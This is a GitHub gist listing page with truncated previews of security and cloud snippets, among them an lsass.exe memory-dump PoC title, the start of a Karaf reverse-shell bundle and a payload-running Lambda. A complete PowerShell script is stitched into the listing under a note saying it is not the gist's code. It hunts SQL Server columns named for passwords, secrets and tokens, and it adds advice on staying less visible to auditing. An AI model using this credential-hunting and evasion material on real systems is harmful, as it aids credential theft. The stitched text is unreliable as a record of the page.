2XXE GeneralTesler

@GeneralTesler
GeneralTesler / refl.cpp
Last active Nov 17, 2021
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
GeneralTesler / filters.txt
! hide annoying google drive modal that prompts to sign in
docs.google.com##.docs-dialog.modal-dialog
docs.google.com##.modal-dialog-bg
! crunchyroll filters
||fwmrm.net/ad/*
||facebook.com/rtb_video/*
||crunchyroll.com/*.mp4
@GeneralTesler
GeneralTesler / funi.md
Created Aug 17, 2020
Enable subtitles on Funimation web player

Enable subtitles on Funimation web player using VideoJS addRemoteTextTrack

// get the player iframe 
var frame = document.getElementsByTagName("iframe")[0].contentWindow
// get the videojs object inside the iframe 
// fp is the instance of the FunimationPlayer inside the iframe and stores the text track info
//     vtt is usually the first item in the text track list
frame.videojs.getPlayer("brightcove-player").addRemoteTextTrack(frame.fp.currentVideo.source.textTracks[0])
@GeneralTesler
GeneralTesler / boto3_log.py
Created May 25, 2020
Log AWS API calls using boto3 event system
# see: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/events.html#provide-client-params
import boto3
from botocore.client import Config
from botocore import UNSIGNED
import json
def intercept_params(params, **kwargs):
    print(
        json.dumps(
@GeneralTesler
GeneralTesler / boto3_patch.py
Last active May 25, 2020
Patch botocore to log API calls + parameters
import boto3
import botocore
from botocore.client import BaseClient, Config, ClientMeta
import json
def log_api(self, operation_name, api_params):
    meta: ClientMeta = self.meta
    print(
        json.dumps(
@GeneralTesler
GeneralTesler / ladon.go
Created Feb 17, 2020
basic code for using Ladon; taken + merged from readme: https://github.com/ory/ladon
package main
import (
    "log"

    "github.com/ory/ladon"
    manager "github.com/ory/ladon/manager/memory"
)
func main() {
@GeneralTesler
GeneralTesler / mssql.ps1
Last active Dec 15, 2019
Search MSSQL databases for columns containing keywords using SqlServer PowerShell PSDrive
Import-Module SqlServer
function Get-SQLTablesByKeyword {
<#
Usage:
    Get-SQLTablesByKeyword -Computer <hostname>
Example:
    Get-SQLTablesByKeyword -Computer sql01.domain.local
Example Output:
    Table Database Column
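The gist preview above stops at the help block, so as an added example (my code, not GeneralTesler's gist) here is one way to do the same keyword sweep over the SqlServer module's SQLSERVER: PSDrive. It assumes the SqlServer module is installed, that the caller can reach the instance with integrated authentication and has VIEW DEFINITION (or higher) rights, and that the instance is the default one unless -Instance is given; the keyword list and the function name are my own choices, and sql01.domain.local in the usage note is the hostname from the gist's own example.

```powershell
# Added example, not the gist's code: enumerate every user-visible column on an
# instance through the SQLSERVER: provider and report those whose name matches a
# keyword. Assumes the SqlServer module, integrated auth, and a reachable instance.
Import-Module SqlServer

function Find-SqlColumnByKeyword {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Computer,
        [string] $Instance = 'DEFAULT',            # named instance: pass its name instead
        [string[]] $Keyword = @('pass', 'pwd', 'secret', 'token', 'ssn', 'card')  # assumed list
    )

    # Provider layout: SQLSERVER:\SQL\<host>\<instance>\Databases\<db>\Tables\<schema>.<table>
    $dbRoot = "SQLSERVER:\SQL\$Computer\$Instance\Databases"

    # -Force also lists system databases (master, msdb, ...), which can hold
    # linked-server and job credentials worth flagging
    foreach ($db in Get-ChildItem -Path $dbRoot -Force) {
        # Offline / restoring databases cannot be enumerated; skip instead of erroring out
        if ($db.Status -ne 'Normal') { continue }

        foreach ($table in Get-ChildItem -Path "$dbRoot\$($db.Name)\Tables") {
            foreach ($column in $table.Columns) {
                # -match is case-insensitive in PowerShell; escape so 'card.' style
                # keywords are treated literally
                $hit = $Keyword |
                    Where-Object { $column.Name -match [regex]::Escape($_) } |
                    Select-Object -First 1
                if ($hit) {
                    [pscustomobject]@{
                        Database = $db.Name
                        Table    = "$($table.Schema).$($table.Name)"
                        Column   = $column.Name
                        DataType = $column.DataType.Name
                        Keyword  = $hit
                    }
                }
            }
        }
    }
}
```

Usage: `Find-SqlColumnByKeyword -Computer sql01.domain.local | Format-Table -AutoSize`. Walking the provider opens an SMO connection per database and reads metadata for every table, so on a large instance it is slow and, if SQL Audit or Extended Events are capturing metadata access, very visible; a single query against INFORMATION_SCHEMA.COLUMNS per database is the quieter alternative when you only need names.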
GeneralTesler / lambda_gscript.json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "ssm:SendCommand",
                "codepipeline:PutJobFailureResult",
                "codepipeline:PutJobSuccessResult",
GeneralTesler / gscript_lambda.py
import json,os,boto3
def lambda_handler(event, context):
    iid = os.getenv('INSTANCE_ID', None)
    pd = os.getenv('PAYLOAD_DIR', None)
    pipeline = boto3.client('codepipeline')
    job = event['CodePipeline.job']['id']
    if iid is None or pd is None:
@GeneralTesler
GeneralTesler / ExecActivator.java
Last active Dec 6, 2019
simple reverse shell via OSGi bundle for Karaf
package com.demo.exec;
import org.osgi.framework.BundleActivator;
import org.osgi.framework.BundleContext;
import java.lang.*;
public class ExecActivator implements BundleActivator {
    @Override
    public void start(BundleContext bundleContext) throws Exception {